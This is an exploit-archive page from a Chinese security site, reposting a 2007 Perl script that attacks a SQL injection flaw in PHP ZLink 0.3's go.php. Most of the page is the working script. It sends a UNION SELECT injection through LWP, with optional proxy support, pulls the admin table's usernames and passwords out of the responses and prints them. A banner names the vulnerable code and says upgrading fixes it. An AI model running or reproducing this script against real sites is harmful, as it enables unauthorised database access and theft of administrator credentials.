首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 PHP ZLink 0.3 (go.php) Remote SQL Injection Exploit 来源：http://www.zeak.net 作者：DNX 发布时间：2007-12-24   #!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[3]) {   print "\n                         \\#'#/                    ";   print "\n                         (-.-)                     ";   print "\n   -----------------oOO---(_)---OOo----------------";   print "\n   | PHP ZLink v0.3 (go.php) Remote SQL Injection |";   print "\n   |                 coded by DNX                 |";   print "\n   ------------------------------------------------";   print "\n[!] Discovered.: DNX";   print "\n[!] Vendor.....: http://www.zeak.net";   print "\n[!] Detected...: 28.10.2007";   print "\n[!] Reported...: 28.10.2007";   print "\n[!] Response...: 29.10.2007";   print "\n";   print "\n[!] Background.: PHP ZLink is a free short Url Redirection Script";   print "\n";   print "\n[!] Bug........: \$id in go.php";   print "\n";   print "\n                 line 25: \$id = \$_GET['id']";   print "\n";   print "\n                 line 28: SELECT url FROM \$table WHERE id = \$id";   print "\n";   print "\n[!] Solution...: Upgrade to PHP ZLink v1.0";   print "\n";   print "\n[!] Usage......: perl zlink.pl [Host] [Path] <Options>";   print "\n[!] Example....: perl zlink.pl 127.0.0.1 /zlink/ -id 1";   print "\n[!] Options....:";   print "\n       -id [no]      Valid ID";   print "\n       -p [ip:port]  Proxy support";   print "\n";   exit; } my $host    = $ARGV[0]; my $path    = $ARGV[1]; my $table   = "admin"; my $id      = 0; my %options = (); GetOptions(\%options, "id=i", "p=s"); print "[!] Exploiting...\n"; if($options{"id"}) {   exploit($options{"id"}); } else {   print "[!] Exploit failed, missing parameter\n";   exit; } print "\n[!] Exploit done\n"; sub exploit {   my $id     = shift;   my $url    = "http://".$host.$path."go.php?id=".$id."%20union%20select%20concat(username,0x2f,password)%20from%20admin";   my $regexp = "<iframe(.*)src=\"(.*)\"><\/iframe>";     my $ua = LWP::UserAgent->new;     if($options{"p"})   {     $ua->proxy('http', "http://".$options{"p"});   }     my $response = $ua->get($url);   my $content = $response->content;   @content = split(/\n/, $content);   $found = 0;     foreach (@content)   {     if($_ =~ /$regexp/ && $2 !~ /http/)     {       ($user, $pass) = split(/\//, $2);       print "User/Password: ".$user."/".$pass."\n";       $found = 1;     }   }     if(!$found)   {     $count = 2;     $noendless = 20;     while($count < $noendless)     {       $response = $ua->get($url."%20limit%20".$count++);       if($tmp eq $response->base)       {         $count = $noendless;       }       else       {                $tmp = $response->base;         ($x, $y) = split(/$host$path/, $tmp);         print "User/Password: ".$y."\n";       }     }   } }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·OpenSSL < 0.9.7l / 0.9.8d SSLv ·CuteNews <= 1.4.5 Admin Passwo ·Shadowed Portal <= 5.7d3 Remot ·Jupiter 1.1.5ex Privileges Esc ·Apple Mac OS X mount_smbfs Sta ·BadBlue 2.72 PassThru Remote B ·Linux Kernel < 2.6.11.5 BLUETO ·AuraCMS 2.2 (admin_users.php) ·3proxy 0.5.3g logurl() Remote ·RunCMS 1.6 Get Admin Cookie Re ·iMesh <= 7.1.0.x (IMWeb.dll 7. ·RunCMS 1.6 Remote Blind SQL In   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved